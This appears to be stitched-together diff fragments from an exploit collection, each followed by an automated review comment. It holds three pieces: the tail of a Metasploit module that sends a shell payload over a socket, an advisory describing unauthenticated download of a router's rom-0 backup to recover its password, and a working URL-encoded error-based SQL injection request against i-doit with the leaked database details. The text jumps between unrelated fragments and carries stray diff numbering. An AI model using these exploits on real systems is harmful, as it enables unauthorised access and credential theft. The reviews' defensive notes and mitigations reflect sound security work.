if !send_request(datastore['RHOST'],datastore['RPORT'])then#controllo della funzione di invio , passando i dati scelti dal utenti mediante il datastore[] di msf.
69
+
raise("[-] Errore nel apertura della porta")
70
+
end
71
+
print_good("[+] Richiesta inviata con successo! :)")
72
+
nsock=self.connect(false,{"RPORT"=>datastore['RPORT']})rescuenil#inizio a fare la conessione
73
+
print_good("[+] Porta aperta con successo ! :)")
74
+
nsock.put(payload.encoded + " >/dev/null 2>&1")#passo il payload per creare una communicazione con la /bin/sh create sulla porta, ">/dev/null 2>&1" invio Stand Error in un backhole e dopo su 1 -> Standard Out.
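Review bot: `rescue nil` on the `nsock=self.connect(...)` line swallows every connection failure and leaves `nsock` as `nil`, so the unconditional `print_good("[+] Porta aperta con successo ! :)")` reports success even when nothing connected, and the following `nsock.put(...)` then dies with `NoMethodError` instead of a meaningful failure; check the socket before using it, e.g. `fail_with(Failure::Unreachable, "Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}") unless nsock`, and print the success message only after that check. The bare `raise("[-] Errore nel apertura della porta")` in the first branch should likewise go through `fail_with` with a `Failure::` reason so the framework reports it consistently. The comment on the `nsock.put` line describes the redirection backwards: `>/dev/null 2>&1` sends stdout to /dev/null and then points stderr at stdout, so both streams are discarded. Comments are written in Italian; English is the convention for Metasploit modules.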
#Exploit Title: Across DR-810 ROM-0 Backup - File Disclosure(Sensitive Information)
2
+
#Date: 2019-01-11
3
+
#Exploit Author: SajjadBnd
4
+
#My Email: blackwolf@post.com
5
+
#Vendor Homepage: http://www.ac.i8i.ir/
6
+
#Version: DR-810
7
+
#Tested on: DR-810
8
+
#RomPager/4.07 UPnP/1.0
9
+
10
+
[+] About
11
+
==========
12
+
this hardware is a SIM card modem , This modem is being installed in Iran and sold with the SIM card
13
+
i8i.ir An internet site that sells products like SIM-card modems This modem has sold countless And on the main page of the site wrote:
14
+
15
+
SIM modems are used in a variety of ways and for similar uses, and depending on the features and quality, they have a variety of prices.
16
+
In this site, you will be familiar with the five modem and router sim-modem groups, which you can consult with us to choose the best option for you, and choose one of them.
17
+
18
+
[+] Rom-0 Backup File Disclosure
19
+
=================================
20
+
A dangerous vulnerability present on many network devices which are using
21
+
RomPager.The rom-0 file contains sensitive information such as the router password.
22
+
There is a disclosure in which anyone can download that file without any authentication by
23
+
a simple GET request.
24
+
25
+
[+] POC
26
+
========
27
+
just add /rom-0 to your target address
28
+
rom-0 Backup File will be downloaded
29
+
30
+
http://target/rom-0
31
+
32
+
then you can Decompressed the file and get password
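Review bot: the header block lists `#Version: DR-810` and `#Tested on: DR-810`, which are both the model name, not a firmware version; the affected firmware build should be stated (the `RomPager/4.07 UPnP/1.0` banner is the only version indicator given) so a reader can tell whether a specific unit is affected, and the About section's vendor marketing text does not belong in an advisory. The write-up also gives no fix or mitigation: it should say whether a vendor patch exists and, at minimum, that the web administration interface must not be reachable from the WAN side and that the `/rom-0` download has to require authentication. Minor: "Decompressed the file and get password" should read "decompress the file and extract the password", and the `[+] POC` section would read better as numbered steps.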
GET /[PATH]/?objGroupID=%31%32%27%7c%7c%28SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20%28seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT%28CONcat(0x203a20%2cUseR()%2cDAtaBASe()%2cVErsION())%2c(SeLEct%20%28ELT(112=112%2c1%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x%29a%29%29%7c%7c%27 HTTP/1.1
19
+
Host: TARGET
20
+
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
X-i-doit-Notification-0: {"message":"Database error : Query error: 'SELECT DISTINCT(isys_obj_type_group__const) FROM isys_obj_type\r\n\t\t\tINNER JOIN isys_obj_type_group ON isys_obj_type_group__id = isys_obj_type__isys_obj_type_group__id WHERE isys_obj_type_group__status = 2 AND isys_obj_type_group__id = '12'||(SeleCT 'Efe' FroM duAL WheRE 110=110 AnD (seLEcT 112 frOM(SElecT CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct (ELT(112=112,1))),FLooR(RAnd(0)*2))x FROM INFOrmatION_SchEMA.PluGINS grOUp BY x)a))||'' ORDER BY isys_obj_type_group__sort, isys_obj_type_group__const ASC LIMIT 0,1':\nDuplicate entry ' : admin@localhostidoit_data10.1.21-MariaDB11' for key 'group_key'\n","type":2,"options":{"sticky":true,"width":"400px","header":""}}
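Review bot: the hunk puts the request (`GET /[PATH]/?objGroupID=...`, `Host: TARGET`, `User-Agent: ...`) and the server's `X-i-doit-Notification-0:` response header into one block with no blank line or label between them, so a reader cannot tell where the request ends and the response begins; separate them as request and response, and record the product version the request was tested against, which the commit does not state. The response header is the finding worth documenting: the error-based injection through `objGroupID` reaches `isys_obj_type_group__id` unescaped and the raw query error returned in the notification header leaks the database user, schema name and server version (`admin@localhost`, `idoit_data`, `10.1.21-MariaDB`), so the application-side fix is a parameterised query for that lookup plus suppression of database error text in responses.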